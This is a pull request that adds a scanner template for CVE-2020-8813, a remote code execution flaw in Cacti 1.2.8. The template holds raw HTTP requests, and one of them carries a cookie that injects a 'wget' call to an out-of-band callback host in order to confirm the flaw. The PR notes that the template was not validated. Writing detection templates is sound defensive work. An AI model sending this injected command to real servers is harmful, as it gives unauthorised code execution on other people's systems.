### PR TITLE
Create CVE-2020-8813.yaml

### DIFF
--- a/cves/2020/CVE-2020-8813.yaml
+++ b/cves/2020/CVE-2020-8813.yaml
@@ -1,0 +1,35 @@
+id: CVE-2020-8813
+
+info:
+  name: Cacti v1.2.8 - Unauthenticated Remote Code Execution
+  author: gy741
+  severity: critical
+  description: This vulnerability could be exploited without authentication if Cacti is enabling “Guest Realtime Graphs” privilege, So in this case no need for the authentication part and you can just use the following code to exploit the vulnerability
+  reference: |
+    - https://shells.systems/cacti-v1-2-8-authenticated-remote-code-execution-cve-2020-8813/
+  tags: cve,cve2020,cacti,rce,oob
+
+requests:
+  - raw:
+      - |
+        GET /graph_realtime.php?action=init HTTP/1.1
+        Host: {{Hostname}}
+        User-Agent: python-requests/2.18.4
+        Accept-Encoding: gzip, deflate
+        Accept: */*
+        Connection: keep-alive
+
+      - |
+        GET /graph_realtime.php?action=init HTTP/1.1
+        Host: {{Hostname}}
+        User-Agent: python-requests/2.18.4
+        Accept-Encoding: gzip, deflate
+        Accept: */*
+        Connection: keep-alive
+        Cookie: Cacti=%3Bwget%20http%3A//{{interactsh-url}}
+
+    matchers:
+      - type: word
+        part: interactsh_protocol # Confirms the HTTP Interaction
+        words:
+          - "http"

--- a/cves/2020/CVE-2020-8813.yaml
+++ b/cves/2020/CVE-2020-8813.yaml
@@ -18,14 +18,6 @@ requests:
         Accept-Encoding: gzip, deflate
         Accept: */*
         Connection: keep-alive
-
-      - |
-        GET /graph_realtime.php?action=init HTTP/1.1
-        Host: {{Hostname}}
-        User-Agent: python-requests/2.18.4
-        Accept-Encoding: gzip, deflate
-        Accept: */*
-        Connection: keep-alive
         Cookie: Cacti=%3Bwget%20http%3A//{{interactsh-url}}
 
     matchers:


### PR DESCRIPTION
### Template / PR Information

Hello,

Added CVE-2020-8813

```
This vulnerability could be exploited without authentication if Cacti is enabling “Guest Realtime Graphs” privilege, So in this case no need for the authentication part and you can just use the following code to exploit the vulnerability
```

I used the PoC at the bottom of the reference.


- References: https://shells.systems/cacti-v1-2-8-authenticated-remote-code-execution-cve-2020-8813/

### Template Validation

I've validated this template locally?
- [ ] YES
- [v] NO

